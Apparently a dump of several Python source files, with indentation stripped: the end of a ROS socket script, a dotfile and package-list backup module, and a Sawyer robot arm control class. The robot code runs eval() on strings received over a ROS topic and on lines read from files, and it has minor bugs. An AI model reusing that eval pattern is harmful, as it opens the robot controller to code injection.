if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
|
backup.py
|
import os
from shlex import quote
from colorama import Fore
import multiprocessing as mp
from shutil import copytree, copyfile
from .utils import *
from .printing import *
from .compatibility import *
from .config import get_config
def backup_dotfiles(backup_dest_path, home_path=os.path.expanduser("~"), skip=False):
"""
Create `dotfiles` dir and makes copies of dotfiles and dotfolders.
Assumes that dotfiles are stored in the home directory.
:param skip: Boolean flag to skip prompting for overwrite. Used for scripting.
:param backup_dest_path: Destination path for dotfiles. Like, ~/shallow-backup/dotfiles
:param home_path: Path where dotfiles will be found. $HOME by default.
"""
print_section_header("DOTFILES", Fore.BLUE)
overwrite_dir_prompt_if_needed(backup_dest_path, skip)
# get dotfolders and dotfiles
config = get_config()
# dotfiles/folders multiprocessing format: [(full_dotfile_path, full_dest_path), ...]
dotfolders_mp_in = []
for dotfolder in [os.path.join(home_path, folder) for folder in config["dotfolders"]]:
if os.path.isdir(dotfolder):
dest_path_nested_dir = os.path.join(backup_dest_path, dotfolder.replace(home_path + "/", ""))
dotfolders_mp_in.append((quote(dotfolder), quote(dest_path_nested_dir)))
dotfiles_mp_in = []
for dotfile in config["dotfiles"]:
full_dotfile_path = os.path.join(home_path, dotfile)
if os.path.isfile(full_dotfile_path):
dest_path = quote(os.path.join(backup_dest_path, dotfile))
dotfiles_mp_in.append((quote(full_dotfile_path), dest_path))
# Fix https://github.com/alichtman/shallow-backup/issues/230
for dest_path in [path_pair[1] for path_pair in dotfiles_mp_in + dotfolders_mp_in]:
create_dir_if_doesnt_exist(os.path.split(dest_path)[0])
with mp.Pool(mp.cpu_count()):
print_blue_bold("Backing up dotfolders...")
for x in dotfolders_mp_in:
p = mp.Process(target=copy_dir_if_valid, args=(x[0], x[1],))
p.start()
p.join()
print_blue_bold("Backing up dotfiles...")
for x in dotfiles_mp_in:
p = mp.Process(target=copyfile, args=(x[0], x[1],))
p.start()
p.join()
def backup_configs(backup_path, skip=False):
"""
Creates `configs` directory and places config backups there.
Configs are application settings, generally. .plist files count.
In the config file, the value of the configs dictionary is the dest
path relative to the configs/ directory.
"""
print_section_header("CONFIGS", Fore.BLUE)
overwrite_dir_prompt_if_needed(backup_path, skip)
config = get_config()
print_blue_bold("Backing up configs...")
# backup config files + dirs in backup_path/<target>/
for path_to_backup, target in config["config_mapping"].items():
print("BACKUP:", path_to_backup)
print("TARGET:", target)
dest = os.path.join(backup_path, target)
if os.path.isdir(path_to_backup):
# TODO: Symlink to speed things up
copytree(path_to_backup, quote(dest), symlinks=True)
elif os.path.isfile(path_to_backup):
parent_dir = dest[:dest.rfind("/")]
safe_mkdir(parent_dir)
copyfile(path_to_backup, quote(dest))
# backup crontab
command = "crontab -l"
dest = os.path.join(backup_path, "crontab.txt")
run_cmd_write_stdout(command, dest)
def backup_packages(backup_path, skip=False):
"""
Creates `packages` directory and places install list text files there.
"""
print_section_header("PACKAGES", Fore.BLUE)
overwrite_dir_prompt_if_needed(backup_path, skip)
std_package_managers = [
"brew",
"brew cask",
"gem"
]
for mgr in std_package_managers:
# deal with package managers that have spaces in them.
print_pkg_mgr_backup(mgr)
command = "{} list".format(mgr)
dest = "{}/{}_list.txt".format(backup_path, mgr.replace(" ", "-"))
run_cmd_write_stdout(command, dest)
# cargo
print_pkg_mgr_backup("cargo")
command = "ls {}".format(home_prefix(".cargo/bin/"))
dest = "{}/cargo_list.txt".format(backup_path)
run_cmd_write_stdout(command, dest)
# pip
print_pkg_mgr_backup("pip")
command = "pip list --format=freeze"
dest = "{}/pip_list.txt".format(backup_path)
run_cmd_write_stdout(command, dest)
# pip3
print_pkg_mgr_backup("pip3")
command = "pip3 list --format=freeze"
dest = "{}/pip3_list.txt".format(backup_path)
run_cmd_write_stdout(command, dest)
# npm
print_pkg_mgr_backup("npm")
command = "npm ls --global --parseable=true --depth=0"
temp_file_path = "{}/npm_temp_list.txt".format(backup_path)
if not run_cmd_write_stdout(command, temp_file_path):
npm_dest_file = "{0}/npm_list.txt".format(backup_path)
# Parse npm output
with open(temp_file_path, mode="r+") as temp_file:
# Skip first line of file
temp_file.seek(1)
with open(npm_dest_file, mode="w+") as dest:
for line in temp_file:
dest.write(line.split("/")[-1])
os.remove(temp_file_path)
# atom package manager
print_pkg_mgr_backup("Atom")
command = "apm list --installed --bare"
dest = "{}/apm_list.txt".format(backup_path)
run_cmd_write_stdout(command, dest)
# vscode extensions
print_pkg_mgr_backup("VSCode")
command = "code --list-extensions --show-versions"
dest = "{}/vscode_list.txt".format(backup_path)
run_cmd_write_stdout(command, dest)
# macports
print_pkg_mgr_backup("macports")
command = "port installed requested"
dest = "{}/macports_list.txt".format(backup_path)
run_cmd_write_stdout(command, dest)
# system installs
print_pkg_mgr_backup("System Applications")
applications_path = get_applications_dir()
command = "ls {}".format(applications_path)
dest = "{}/system_apps_list.txt".format(backup_path)
run_cmd_write_stdout(command, dest)
def backup_fonts(backup_path, skip=False):
"""
Copies all .ttf and .otf files in ~/Library/Fonts/ to backup/fonts/
"""
print_section_header("FONTS", Fore.BLUE)
overwrite_dir_prompt_if_needed(backup_path, skip)
print_blue("Copying '.otf' and '.ttf' fonts...")
fonts_path = get_fonts_dir()
if os.path.isdir(fonts_path):
fonts = [quote(os.path.join(fonts_path, font)) for font in os.listdir(fonts_path) if
font.endswith(".otf") or font.endswith(".ttf")]
for font in fonts:
if os.path.exists(font):
copyfile(font, os.path.join(backup_path, font.split("/")[-1]))
else:
print_red('Skipping fonts backup. No fonts directory found.')
def backup_all(dotfiles_path, packages_path, fonts_path, configs_path, skip=False):
"""
Complete backup procedure.
"""
backup_dotfiles(dotfiles_path, skip=skip)
backup_packages(packages_path, skip)
backup_fonts(fonts_path, skip)
backup_configs(configs_path, skip)
|
mysawyer.py
|
#
# Copyright (C) 2018 Isao Hara,AIST,JP
# All rights reserved
#
#
from __future__ import print_function
import os
import sys
import traceback
import rospy
import intera_interface
import numpy as np
import threading
import cv2
import cv_bridge
import tf
import JARA_ARM
#
#
from intera_core_msgs.msg import InteractionControlCommand
from geometry_msgs.msg import Pose
from geometry_msgs.msg import PoseStamped
import PyKDL
from tf_conversions import posemath
from intera_motion_interface import (
MotionTrajectory,
MotionWaypoint,
MotionWaypointOptions,
InteractionOptions
)
from intera_motion_msgs.msg import TrajectoryOptions
from std_msgs.msg import String
from sensor_msgs.msg import Image
#
#
#
class MySawyer(object):
#
# Init class
def __init__(self, name='MySawyer', limb='right', anonymous=True, disable_signals=True, light=True, gripper_reverse=False):
rospy.init_node(name, anonymous=anonymous, disable_signals=disable_signals)
# rospy.sleep(1)
#
#
self._limb=None
self._head=None
self._light=None
self._head_display=None
self._display=None
self._cuff=None
self._limits=None
self._navigator=None
self._init_nodes(limb,light)
self._get_gripper(gripper_reverse)
#
# Default Variables
self._home_pos=[0.0, -1.178, 0.0, 2.178, 0.0, 0.567, 3.313]
self._init_pos=[0.0, -1.178, 0.0, 2.178, 0.0, 0.567, 3.313]
self._default_pos=[0.0, -0.9, 0.0, 1.8, 0.0, -0.9, 0.0]
self._motion_trajectory=None
#self._joint_names=self._limb.joint_names()
#self._velocity_limits=self._limits.joint_velocity_limits()
#
# for motion controller
self._motions={}
self._joint_positions={'home':self._home_pos,'init':self._init_pos, 'default':self._default_pos}
self._index=0
self._p_index=0
self._is_recording=False
self.max_record_time=30
self._accuracy=0.01 # 0.05 this value use velocity control mode and position control mode
self._recording_intval=0.5
#
# for velicity control mode
self._running=True
self._target=[0.0, -1.178, 0.0, 2.178, 0.0, 0.567, 3.313] ### initial position
self._target_motion=[]
self._vmax=0.4
self._vrate=2.0
self._is_moving=False
#
# for interaction mode
self._speed_ratio=0.1 # 0.001 -- 1.0
self._max_speed_ratio=0.5 # 0.001 -- 1.0
self._max_accel_ratio=0.5 # 0.001 -- 1.0
self._trajType='JOINT' # 'JOINT' ot 'CARTESIAN'
self._interaction_active=True
self._K_impedance=[1300.0,1300.0, 1300.0, 30.0, 30.0, 30.0]
self._max_impedance=[1,1,1,1,1,1]
self._interaction_control_mode=[1,1,1,1,1,1]
self._interaction_frame=[0,0,0,1,0,0,0]
self._in_endpoint_frame=False
self._endpoint_name='right_hand'
self._force_command=[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
self._K_nullspace=[5.0, 10.0, 5.0, 10.0, 5.0, 10.0, 5.0]
self._disable_damping_in_force_control=False
self._disable_reference_resetting=False
self._rotations_for_constrained_zeroG=False
self._timeout=None
# for Cartesian Pose base motion
self._in_tip_frame=False
self._tip_name='right_hand'
self._linear_speed=0.6 # m/s
self._linear_accel=0.6 # m/s/s
self._rotational_speed=1.57 # rad/s
self._rotational_accel=1.57 # rad/s/s
## for event handlers
self.ok_id=None
self.show_id=None
self.back_id=None
#
# for RTC
self._is_pause=False
#
#
def _init_nodes(self, limb, light):
try:
self._limb=intera_interface.Limb(limb)
self._head=intera_interface.Head()
self._light=SawyerLight(light)
#self._head_display=intera_interface.HeadDisplay()
self._display=SawyerDisplay()
self._cuff=intera_interface.Cuff()
self._limits=intera_interface.JointLimits()
self._navigator=intera_interface.Navigator()
self._joint_names=self._limb.joint_names()
self._velocity_limits=self._limits.joint_velocity_limits()
self._stop_cmd={}
for i,name in enumerate(self._joint_names):
self._stop_cmd[name]=0.0
except:
print("Warning caught exception...")
traceback.print_exc()
pass
#
3
def _get_gripper(self, gripper_reverse):
try:
self._gripper=intera_interface.get_current_gripper_interface()
self._is_clicksmart = isinstance(self._gripper, intera_interface.SimpleClickSmartGripper)
self._gripper_reverse=gripper_reverse
if self._is_clicksmart:
if self._gripper.needs_init():
self._gripper.initialize()
_signals=self._gripper.get_ee_signals()
if 'grip' in _signals:
self._gripper_type='grip'
elif 'vacuumOn' in _signals:
self._gripper_type='vacuum'
else:
self._gripper_type='unknown'
else:
if not (self._gripper.is_calibrated() or
self._gripper.calibrate() == True):
raise
except:
self._gripper=None
self._is_clicksmart=False
self._gripper_type=None
self._gripper_reverse=None
#
#
def activate(self):
#
# Enable Robot
self._rs=intera_interface.RobotEnable(intera_interface.CHECK_VERSION)
self._init_state=self._rs.state().enabled
self._rs.enable()
#
# current positions
self._angles=self._limb.joint_angles()
self._pose=self._limb.endpoint_pose()
#
#
self._limb.set_joint_position_speed(self._speed_ratio)
#
# LED white ON
self._light.head_on()
self.mkRosPorts()
self.set_record()
#
#
def mkRosPorts(self):
self._sub=dict()
self._pub=dict()
self._sub['target_joint_pos']=rospy.Subscriber('target_joint_pos', String,self.set_target_joint_pos)
self._pub['current_joint_pos']=rospy.Publisher('current_joint_pos', String,queue_size=1)
self._pub['target_joint_pos']=rospy.Publisher('target_joint_pos', String,queue_size=1)
self._pub['image']=rospy.Publisher('/robot/head_display', Image, latch=True, queue_size=10)
#
#
def set_motion_sequencer(self):
self.set_subscriber('current_joint_pos', self.set_next_target, String)
#
#
def set_subscriber(self, name, func, arg_type=String):
if name in self._sub and self._sub[name]: self._sub[name].unregister()
self._sub[name]=rospy.Subscriber(name, arg_type,func)
def unset_subscriber(self, name):
if name in self._sub and self._sub[name]: self._sub[name].unregister()
self._sub[name]=None
#
#
def enable(self):
self._rs.enable()
#
#
def state(self):
print(self._rs.state())
#
#
def reset(self):
self._rs.reset()
#
#
def disable(self):
self._rs.disable()
#
#
def stop(self):
self._rs.stop()
#
#
def exit_control_mode(self):
self._limb.exit_control_mode()
#
#
def update_pose(self):
self._angles=self._limb.joint_angles()
self._pose=self._limb.endpoint_pose()
#
#
def init_pos(self, use_motion_ctrl=True):
if use_motion_ctrl:
self.move_to([self._init_pos])
else:
self._light.head_green()
self._limb.move_to_neutral(speed=self._speed_ratio)
self.update_pose()
self._light.head_on()
#
#
def set_speed(self, rate=0.3):
self._speed_ratio=rate
self._limb.set_joint_position_speed(rate)
#
#
def print_joiint_pos(self, dtime=5.0, intval=0.1):
end_time = rospy.Time.now() + rospy.Duration(dtime)
while rospy.Time.now() < end_time:
if rospy.is_shutdown() : break
print(self._limb.endpoint_pose())
rospy.sleep(intval)
##############################################
# Joint Position Control (Depreciated for Intera 5.2 and beyond)
def move_joints(self, pos):
self._limb.set_joint_position_speed(self._speed_ratio)
self._light.head_green()
self._limb.move_to_joint_positions(pos)
self.update_pose()
self._light.head_on()
#
#
def move_cart(self, x_dist, y_dist, z_dist):
self._limb.set_joint_position_speed(self._speed_ratio)
self._pose=self.endpoint_pose()
self._pose.position.x += x_dist
self._pose.position.y += y_dist
self._pose.position.z += z_dist
self.move_joints(self._limb.ik_request(self._pose))
#
#
def record_motion(self, name=None, dtime=0, intval=1.0):
if not name :
name=self.mk_motion_name()
self._index += 1
if dtime <= 0:
dtime=self.max_record_time
print ("Start Recording:", name)
self._light.head_blue()
self._motions[name]=[]
self._is_recording=True
end_time = rospy.Time.now() + rospy.Duration(dtime)
while (rospy.Time.now() < end_time) and self._is_recording :
if rospy.is_shutdown() : break
self._motions[name].append(self._limb.joint_angles())
rospy.sleep(intval)
print ("End Recording: record ", len(self._motions[name]), " points")
self._is_recording=False
self._light.head_on()
#
#
def mk_motion_name(self):
name = 'Motion_' + str(self._index)
while name in self._motions:
self._index += 1
name = 'Motion_' + str(self._index)
return name
#
# Record positions
def record_pos(self,val):
if val :
self._light.head_yellow()
name = 'P_' + str(self._p_index)
while name in self._joint_positions:
self._p_index += 1
name = 'P_' + str(self._p_index)
self._joint_positions[name]=self._limb.joint_ordered_angles()
self._light.head_on()
#
# Motion Recorder Event Handleer(Start)
def start_record(self, value):
if value:
print('Start..')
self.record_motion(None, 0, self._recording_intval)
#
# Motion Recorder Event Handler(Stop)
def stop_record(self, value):
if value:
print('Stop..')
self._is_recording=False
#
# set Event Handlers
def set_record(self):
print ("Register callbacks")
self.ok_id=self._navigator.register_callback(self.start_record, 'right_button_ok')
self.back_id=self._navigator.register_callback(self.stop_record, 'right_button_back')
self.square_id=self._navigator.register_callback(self.record_pos, 'right_button_square')
self.show_id=self._navigator.register_callback(self.unset_record, 'right_button_show')
#
# unset Event Handlers
def unset_record(self, value=0):
if value and self.ok_id :
print ("Unregister all callbacks")
if self._navigator.deregister_callback(self.ok_id) : self.ok_id=None
#if self._navigator.deregister_callback(self.show_id) : self.show_id=None
if self._navigator.deregister_callback(self.back_id) : self.back_id=None
if self._navigator.deregister_callback(self.square_id) : self.square_id=None
def gripper_state(self):
if self.is_gripping :
return 1
else:
return 0
#######################################################
#
# For Joint Position mode (before SDK-5.2)
def play_motion(self, name, intval=0.0):
self._limb.set_joint_position_speed(self._speed_ratio)
self._light.head_green()
for pos in self._motions[name]:
if rospy.is_shutdown() :
self._light.head_red()
return
#
self._limb.move_to_joint_positions(pos, threshold=self._accuracy)
if intval > 0: rospy.sleep(intval)
self._light.head_on()
#
#
def play_motion_seq(self, names):
self._limb.set_joint_position_speed(self._speed_ratio)
self._light.head_green()
for name in names:
for pos in self._motions[name]:
if rospy.is_shutdown() :
self._light.head_red()
return
self._limb.move_to_joint_positions(pos)
self._light.head_on()
###############################################
#
#
def list_motions(self):
print(self._motions.keys())
#
#
def joint_pos_d2l(self, pos):
return map(lambda x: pos[x], self._joint_names)
def convert_motion(self, name):
return map(lambda x: self.joint_pos_d2l(x), self._motions[name])
#
#
def save_motion(self, name):
with open("motions/"+name+".jpos", mode="w") as f:
for pos in self._motions[name]:
f.write(str(pos))
f.write("\n")
#
#
def load_motion(self, name):
self._motions[name]=[]
with open("motions/"+name+".jpos") as f:
motion=f.readlines()
for p in motion:
self._motions[name].append( eval(p) )
#
#
def get_joint_positions(self, name):
if type(name) == str:
if name in self._joint_positions:
target_joints=self._joint_positions[name]
else:
print("Invalid position name")
target_joints=None
elif len(name) == 7:
target_joints=name
return target_joints
####################################
#
# Move Motion
def move_to(self, name=None, tout=None, with_in_contact=False, wait_for_result=True):
#
# for Motion Controller Interface
if type(name) == str and name in self._motions:
waypoints=self.convert_motion(name)
elif type(name) == list:
waypoints=name
else:
print("Invalid motion name")
return None
self._motion_trajectory=MotionTrajectory(limb=self._limb)
_wpt_opts=MotionWaypointOptions(max_joint_speed_ratio=self._max_speed_ratio,
max_joint_accel=self._max_accel_ratio)
_waypoint=MotionWaypoint(options=_wpt_opts, limb=self._limb)
#
# set current joint position...
_waypoint.set_joint_angles(joint_angles=self._limb.joint_ordered_angles())
self._motion_trajectory.append_waypoint(_waypoint.to_msg())
#
# set target joint position...
for pos in waypoints:
if type(pos) == str:
if pos in self._joint_positions:
pos=self._joint_positions[pos]
_waypoint.set_joint_angles(joint_angles=pos)
self._motion_trajectory.append_waypoint(_waypoint.to_msg())
else:
_waypoint.set_joint_angles(joint_angles=pos)
self._motion_trajectory.append_waypoint(_waypoint.to_msg())
#
#
if with_in_contact :
opts=self.get_in_contact_opts()
if opts :
self._motion_trajectory.set_trajectory_options(opts)
#
# run motion...
self._light.head_green()
result=self._motion_trajectory.send_trajectory(wait_for_result=wait_for_result,timeout=tout)
#
#
if result is None:
self._light.head_yellow()
print("Trajectory FAILED to send")
return None
#
#
if not wait_for_result : return True
#
if result.result: self._light.head_on()
else: self._light.head_red()
#
#
self._motion_trajectory=None
return result.result
#
# Move in Certecian Mode
def cart_move_to(self, target_pos, tout=None, relative_mode=False, wait_for_result=True):
#
# for Motion Controller Interface
_trajectory_opts=TrajectoryOptions()
_trajectory_opts.interpolation_type=TrajectoryOptions.CARTESIAN
#
self._motion_trajectory=MotionTrajectory(trajectory_options=_trajectory_opts, limb=self._limb)
#
# set Waypoint Options
_wpt_opts=MotionWaypointOptions(max_linear_speed=self._linear_speed,
max_linear_accel=self._linear_accel,
max_rotational_speed=self._rotational_speed,
max_rotational_accel=self._rotational_accel,
max_joint_speed_ratio=1.0)
_waypoint=MotionWaypoint(options=_wpt_opts, limb=self._limb)
#
endpoint_state=self._limb.tip_state(self._tip_name)
pose=endpoint_state.pose
########################################
# set target position
if relative_mode:
# relative position : target_pos -> x, y, z, roll, pitch, yew
trans = PyKDL.Vector(target_pos[0],target_pos[1],target_pos[2])
rot = PyKDL.Rotation.RPY(target_pos[3], target_pos[4],target_pos[5])
f2 = PyKDL.Frame(rot, trans)
if self._in_tip_frame:
# endpoint's cartesian systems
pose=posemath.toMsg(posemath.fromMsg(pose) * f2)
else:
# base's cartesian systems
pose=posemath.toMsg(f2 * posemath.fromMsg(pose))
else:
# global position : x, y, z, rx, ry, rz, rw
pose.position.x=target_pos[0]
pose.position.y=target_pos[1]
pose.position.z=target_pos[2]
pose.orientation.x=target_pos[3]
pose.orientation.y=target_pos[4]
pose.orientation.z=target_pos[5]
pose.orientation.w=target_pos[6]
#
###########################################
# set target position.
poseStamped=PoseStamped()
poseStamped.pose=pose
_waypoint.set_cartesian_pose(poseStamped, self._tip_name, [])
self._motion_trajectory.append_waypoint(_waypoint.to_msg())
#
# run motion...
self._light.head_green()
result=self._motion_trajectory.send_trajectory( wait_for_result=wait_for_result,timeout=tout)
#
if result is None:
self._light.head_yellow()
print("Trajectory FAILED to send")
return None
#
if not wait_for_result : return True
#
if result.result: self._light.head_on()
else: self._light.head_red()
#
self._motion_trajectory=None
return result.result
#
# stop motion...
def stop_trajectory(self):
if self._motion_trajectory :
self._motion_trajectory.stop_trajectory()
#
# set Interaction control
def set_interaction_params(self):
interaction_options = InteractionOptions()
interaction_options.set_interaction_control_active(self._interaction_active)
interaction_options.set_K_impedance(self._K_impedance)
interaction_options.set_max_impedance(self._max_impedance)
interaction_options.set_interaction_control_mode(self._interaction_control_mode)
interaction_options.set_in_endpoint_frame(self._in_endpoint_frame)
interaction_options.set_force_command(self._force_command)
interaction_options.set_K_nullspace(self._K_nullspace)
interaction_options.set_endpoint_name(self._endpoint_name)
if len(self._interaction_frame) == 7:
quat_sum_square = self._interaction_frame[3]*self._interaction_frame[3] + self._interaction_frame[4]*self._interaction_frame[4] + self._interaction_frame[5]*self._interaction_frame[5] + self._interaction_frame[6]*self._interaction_frame[6]
if quat_sum_square < 1.0 + 1e-7 and quat_sum_square > 1.0 - 1e-7:
interaction_frame = Pose()
interaction_frame.position.x = self._interaction_frame[0]
interaction_frame.position.y = self._interaction_frame[1]
interaction_frame.position.z = self._interaction_frame[2]
interaction_frame.orientation.w = self._interaction_frame[3]
interaction_frame.orientation.x = self._interaction_frame[4]
interaction_frame.orientation.y = self._interaction_frame[5]
interaction_frame.orientation.z = self._interaction_frame[6]
interaction_options.set_interaction_frame(interaction_frame)
else:
print('Invalid input to quaternion! The quaternion must be a unit quaternion!')
return None
else:
print('Invalid input to interaction_frame!')
return None
interaction_options.set_disable_damping_in_force_control(self._disable_damping_in_force_control)
interaction_options.set_disable_reference_resetting(self._disable_reference_resetting)
interaction_options.set_rotations_for_constrained_zeroG(self._rotations_for_constrained_zeroG)
return interaction_options
#
#
def set_interaction_mode(self):
pub = rospy.Publisher('/robot/limb/right/interaction_control_command', InteractionControlCommand, queue_size = 1)
interaction_options = self.set_interaction_params()
if interaction_options:
msg=interaction_options.to_msg()
pub.publish(msg)
#
#
def get_in_contact_opts(self):
interaction_options = self.set_interaction_params()
if interaction_options:
trajectory_options = TrajectoryOptions()
trajectory_options.interaction_control = True
trajectory_options.interpolation_type = self._trajType
trajectory_options.interaction_params = interaction_options.to_msg()
return trajectory_options
else:
return None
##############################################################
#
# Open the gripper
def gripper_open(self):
if self._gripper and self._gripper.is_ready():
if self._is_clicksmart:
if 'grip' in self._gripper.get_ee_signals() :
self._gripper.set_ee_signal_value('grip', self._gripper_reverse)
else:
return None
else:
self._gripper.open()
return True
#
# Close the gripper
def gripper_close(self):
if self._gripper and self._gripper.is_ready():
if self._is_clicksmart:
if 'grip' in self._gripper.get_ee_signals() :
print(self._gripper_reverse)
self._gripper.set_ee_signal_value('grip', not self._gripper_reverse)
else:
return None
else:
self._gripper.close()
return True
# Grippper vacuum: True:off, False:on
def gripper_vacuum(self, stat=True):
if self._gripper and self._gripper.is_ready():
if self._is_clicksmart:
if 'vacuumOn' in self._gripper.get_ee_signals() :
self._gripper.set_ee_signal_value('vacuumOn', stat)
return self._gripper.get_ee_signal_value('vacuumOn')
return None
def is_gripping(self):
if self._gripper and self._gripper.is_ready():
if self._is_clicksmart:
if self._gripper.get_ee_signal_value('grip') is None:
return not self._gripper.get_ee_signal_value('vacuumOn')
else:
return self._gripper.get_ee_signal_value('grip')
else:
return self._gripper.is_gripping()
return None
###############################################################
#
# stop the thread of velocity control loop
def stop_vctrl(self):
self._running=False
self._vctrl_th.join()
self._vctrl_th=None
#
# start vctrl_loop with Thread
def start_vctrl(self, hz=100):
self._vctrl_th=threading.Thread(target=self.vctrl_loop, args=(hz,self.report,))
self._vctrl_th.start()
#
# velocity control mode, one cycle
def _vctrl_one_cycle(self, func=None):
cmd={}
cur=self._limb.joint_ordered_angles()
dv=np.array(self._target) - np.array(cur)
if np.linalg.norm(dv) < self._accuracy:
if func:
func(self)
self._is_moving=False
else:
self._is_moving=True
vels = map(lambda x: x*self._vrate, dv)
for i,name in enumerate(self._joint_names):
cmd[name]=maxmin(vels[i] , self._velocity_limits[name]*self._vmax, -self._velocity_limits[name]*self._vmax)
self._limb.set_joint_velocities(cmd)
#
# velocity control loop
def vctrl_loop(self, hz, func=None):
rate=rospy.Rate(hz)
self._running=True
while self._running and (not rospy.is_shutdown()) :
cuff_state=self._cuff.cuff_button()
if cuff_state :
self.set_target()
elif self._limb.has_collided() :
self.set_target()
else:
self._vctrl_one_cycle(func)
rate.sleep()
self._limb.exit_control_mode()
print("Terminated")
#
# callback function for Subscriber
def set_target_joint_pos(self, data):
self._target=eval(data.data)
#
#
def set_next_target(self, data):
try:
self.unset_subscriber('current_joint_pos')
next_target=self._target_motion.pop(0)
self.set_target(next_target)
self.set_motion_sequencer()
except:
self.unset_subscriber('current_joint_pos')
pass
#
# Publish current position
def report(self,val):
cur=self._limb.joint_ordered_angles()
self._pub['current_joint_pos'].publish(str(cur))
#
# Set target joint positions (Publish target joint positions)
def set_target(self, val=None, relative=False):
if val is None:
val=self._limb.joint_ordered_angles()
if type(val) is str:
val=self._joint_positions[val]
elif relative:
if len(self._target) != len(val) :
print("Dimension mismatch")
return
for i,v in enumerate(self._target):
val[i]=v + val[i]
self._pub['target_joint_pos'].publish(str(val))
def set_target_seq(self, targets):
self._target_motion=targets
self.set_next_target('star')
def show_positions(self):
print(self._joint_positions.keys())
#
def set_cart_target(self, x,y,z,roll=9,pitch=0,yew=0, in_tip_frame=True):
#pose = self.convert_Cart2Joint(x,y,z, relativa, end_point)
pos=self.calc_cart_move2joints(x,y,z,roll, pitch,yew, in_tip_frame=in_tip_frame)
val=self.joint_pos_d2l(pos)
self._pub['target_joint_pos'].publish(str(val))
#
# Set movement of target joint posistions
def move_joint(self, idxs, vals):
for i,v in enumerate(idxs) :
self._target[v] += vals[i]
self._pub['target_joint_pos'].publish(str(self._target))
#
# end_point should be 'right_hand' or 'right_arm_base_link'.
def convert_Cart2Joint(self, x,y,z, relative=False, end_point='right_hand'):
_pose=self.endpoint_pose()
if relative:
_pose.position.x += x
_pose.position.y += y
_pose.position.z += z
else:
_pose.position.x = x
_pose.position.y = y
_pose.position.z = z
return self._limb.ik_request(_pose, end_point=end_point)
#
#
def convert_Joint2Cart(self, pos):
_pos=self._limb.joint_angles()
for i,name in enumerate(self._joint_names):
_pos[name]=pos[i]
return self._limb.joint_angles_to_cartesian_pose(_pos)
def endpoint_pose(self):
return self._limb.tip_state('right_hand').pose
#return self._limb.joint_angles_to_cartesian_pose(self._limb.joint_angles())
def calc_relative_pose(self, x,y,z,roll=0,pitch=0,yew=0, in_tip_frame=True):
_pose=self.endpoint_pose()
########################################
# set target position
trans = PyKDL.Vector(x,y,z)
rot = PyKDL.Rotation.RPY(roll,pitch,yew)
f2 = PyKDL.Frame(rot, trans)
if in_tip_frame:
# endpoint's cartesian systems
_pose=posemath.toMsg(posemath.fromMsg(_pose) * f2)
else:
# base's cartesian systems
_pose=posemath.toMsg(f2 * posemath.fromMsg(_pose))
return _pose
def calc_cart_move2joints(self, x,y,z,roll=0,pitch=0,yew=0, in_tip_frame=True):
_pose=self.calc_relative_pose(x,y,z,roll,pitch,yew, in_tip_frame)
return self._limb.ik_request(_pose)
########################################################################
#
# onExecuted
#
def onExecute(self):
cuff_state=self._cuff.cuff_button()
if self._is_pause :
self._limb.set_joint_velocities(self._stop_cmd)
elif cuff_state :
self.set_target()
elif self._limb.has_collided() :
self.set_target()
else:
self._vctrl_one_cycle(self.report)
#
# for RTC(Common)
#
def clearAlarms(self):
print('No alerm..')
return True
def getActiveAlarm(self):
res=[]
return res
def getFeedbackPosJoint(self):
res=map(lambda x: np.rad2deg(x), self._limb.joint_ordered_angles())
res.append(self.gripper_state())
return res
# manifactur: string
# type: string
# axisNum: ULONG
# cmdCycle: ULONG
# isGripper: boolea
def getManipInfo(self):
if self._gripper :
res=['RethinkRobotics', 'Sawyer', 7, 100, True]
else:
res=['RethinkRobotics', 'Sawyer', 7, 100, False]
return res
def getSoftLimitJoint(self):
return None
def getState(self):
stat=self._rs.state()
if stat.enabled :
res=0x01
if self._is_moveing :
res=0x01 | 0x02
else:
res=0x00
return res
def servoOFF(self):
return None
def servoON(self):
return None
def setSoftLimitJoint(self, softLimit):
return None
#
# for RTC(Middle)
#
def openGripper(self):
if self._gripper_type == 'vacuum':
self.gripper_vacuum(False)
else:
self.gripper_open()
return True
def closeGripper(self):
if self._gripper_type == 'vacuum':
self.gripper_vacuum(True)
else:
self.gripper_close()
return True
def moveGripper(self, angleRatio):
print('Move gripper is not supported')
return None
def getBaseOffset(self):
return None
def getFeedbackPosCartesian(self):
return None
def getMaxSpeedCartesian(self):
return None
def getMaxSpeedJoint(self):
return None
def getMinAccelTimeCartesian(self):
return None
def getMinAccelTimeJoint(self):
return None
def getSoftLimitCartesian(self):
return None
def moveLinearCartesianAbs(self, carPos, elbow, flag):
return None
def moveLinearCartesianRel(self, carPos, elbow, flag):
return None
def movePTPCartesianAbs(self, carPos, elbow, flag):
mx=np.array(carPos)
pos=mx[:,3]
mx=np.vstack((mx, [0,0,0,1]))
qtn=tf.transformations.quaternion_from_matrix(mx)
pose=newPose(pos, qtn)
pos=self._limb.ik_request(pose)
self._target=self.joint_pos_d2l(pos)
return None
def movePTPCartesianRel(self, carPos, elbow, flag):
ep=self.endpoint_pose()
mx=np.array(carPos)
pos=mx[:,3]
mx=np.vstack((mx, [0,0,0,1]))
qtn=tf.transformations.quaternion_from_matrix(mx)
dp=newPose(pos, qtn)
pose=addPose(ep, dp)
pos=self._limb.ik_request(pose)
self._target=self.joint_pos_d2l(pos)
return None
def movePTPJointAbs(self, jointPoints):
if len(jointPoints) >= 7:
pos=map(lambda x: np.deg2rad(x), jointPoints[:7])
self._target=pos
return True
else:
return False
def movePTPJointRel(self, jointPoints):
if len(jointPoints) >= 7:
pos=map(lambda x: np.deg2rad(x), jointPoints[:7])
self._target=np.array(self._target) + np.array(pos)
return True
else:
return False
def pause_motion(self):
self._is_pause=True
self._limb.set_joint_velocities(self._stop_cmd)
return True
def resume_motion(self):
self._is_pause=False
return True
def stop_motion(self):
self.set_target()
return True
def setAccelTimeCartesian(self, aclTime):
return None
def setAccelTimeJoint(self, aclTime):
return None
def setBaseOffset(self, offset):
return None
def setControlPointOffset(self, offset):
return None
def setMaxSpeedCartesian(self, sp_trans, sp_rot):
return None
def setMaxSpeedJoint(self, speed):
return None
def setMinAccelTimeCartesian(self, aclTime):
return None
def setMinAccelTimeJoint(self, aclTime):
return None
def setSoftLimitCartesian(self, xLimit, yLimit, zLimit):
return None
def setSpeedCartesian(self, spdRatio):
return None
def setSpeedJoint(self, spdRatio):
self.set_speed(spdRatio)
return True
